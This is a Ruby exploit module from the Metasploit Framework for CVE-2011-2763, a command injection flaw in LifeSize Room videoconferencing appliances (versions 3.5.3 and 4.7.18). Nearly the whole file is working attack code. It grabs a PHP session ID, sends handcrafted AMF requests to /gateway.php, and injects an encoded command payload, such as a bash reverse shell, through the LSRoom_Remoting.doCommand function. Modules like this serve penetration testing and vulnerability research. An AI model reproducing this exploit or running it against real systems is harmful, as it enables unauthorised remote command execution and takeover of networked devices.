113 lines
3.4 KiB
Ruby
113 lines
3.4 KiB
Ruby
##
|
|
# This file is part of the Metasploit Framework and may be subject to
|
|
# redistribution and commercial restrictions. Please see the Metasploit
|
|
# web site for more information on licensing and terms of use.
|
|
# http://metasploit.com/
|
|
##
|
|
|
|
require 'msf/core'
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
Rank = ExcellentRanking
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'LifeSize Room Command Injection',
|
|
'Description' => %q{
|
|
This module exploits a vulnerable resource in LifeSize
|
|
Room versions 3.5.3 and 4.7.18 to inject OS commmands. LifeSize
|
|
Room is an appliance and thus the environment is limited
|
|
resulting in a small set of payload options.
|
|
},
|
|
'Author' =>
|
|
[
|
|
# SecureState R&D Team - Special Thanks To Chris Murrey
|
|
'Spencer McIntyre',
|
|
],
|
|
'License' => MSF_LICENSE,
|
|
'References' =>
|
|
[
|
|
[ 'CVE', '2011-2763' ],
|
|
[ 'OSVDB', '75212' ],
|
|
],
|
|
'Privileged' => false,
|
|
'Payload' =>
|
|
{
|
|
'DisableNops' => true,
|
|
'Space' => 65535, # limited by the two byte size in the AMF encoding
|
|
'Compat' =>
|
|
{
|
|
'PayloadType' => 'cmd cmd_bash',
|
|
'RequiredCmd' => 'generic bash-tcp',
|
|
}
|
|
},
|
|
'Platform' => [ 'unix' ],
|
|
'Arch' => ARCH_CMD,
|
|
'Targets' => [ [ 'Automatic', { } ] ],
|
|
'DisclosureDate' => 'Jul 13 2011',
|
|
'DefaultTarget' => 0))
|
|
end
|
|
|
|
def exploit
|
|
print_status("Requesting PHP Session...")
|
|
res = send_request_cgi({
|
|
'encode' => false,
|
|
'uri' => "/interface/interface.php?uniqueKey=#{rand_text_numeric(13)}",
|
|
'method' => 'GET',
|
|
}, 10)
|
|
|
|
if not (res and res.headers['set-cookie'])
|
|
fail_with(Failure::NotFound, 'Could not obtain a Session ID')
|
|
end
|
|
|
|
sessionid = 'PHPSESSID=' << res.headers['set-cookie'].split('PHPSESSID=')[1].split('; ')[0]
|
|
|
|
headers = {
|
|
'Cookie' => sessionid,
|
|
'Content-Type' => 'application/x-amf',
|
|
}
|
|
|
|
print_status("Validating PHP Session...")
|
|
|
|
data = "\x00\x00\x00\x00\x00\x02\x00\x1b"
|
|
data << "LSRoom_Remoting.amfphpLogin"
|
|
data << "\x00\x02/1\x00\x00\x00"
|
|
data << "\x05\x0a\x00\x00\x00\x00\x00\x17"
|
|
data << "LSRoom_Remoting.getHost"
|
|
data << "\x00\x02\x2f\x32\x00\x00\x00\x05\x0a\x00\x00\x00\x00"
|
|
|
|
res = send_request_cgi({
|
|
'encode' => false,
|
|
'uri' => '/gateway.php',
|
|
'data' => data,
|
|
'method' => 'POST',
|
|
'headers' => headers,
|
|
}, 10)
|
|
|
|
if not res
|
|
fail_with(Failure::NotFound, 'Could not validate the Session ID')
|
|
return
|
|
end
|
|
|
|
print_status("Sending Malicious POST Request...")
|
|
|
|
# This is the amf data for the request to the vulnerable function LSRoom_Remoting.doCommand
|
|
amf_data = "\x00\x00\x00\x00\x00\x01\x00\x19"
|
|
amf_data << "LSRoom_Remoting.doCommand"
|
|
amf_data << "\x00\x02\x2f\x37\xff\xff\xff\xff"
|
|
amf_data << "\x0a\x00\x00\x00\x02\x02#{[payload.encoded.length].pack('n')}#{payload.encoded}"
|
|
amf_data << "\x02\x00\x0dupgradeStatus"
|
|
|
|
res = send_request_cgi({
|
|
'encode' => false,
|
|
'uri' => '/gateway.php?' << sessionid,
|
|
'data' => amf_data,
|
|
'method' => 'POST',
|
|
'headers' => headers
|
|
}, 10)
|
|
end
|
|
|
|
end
|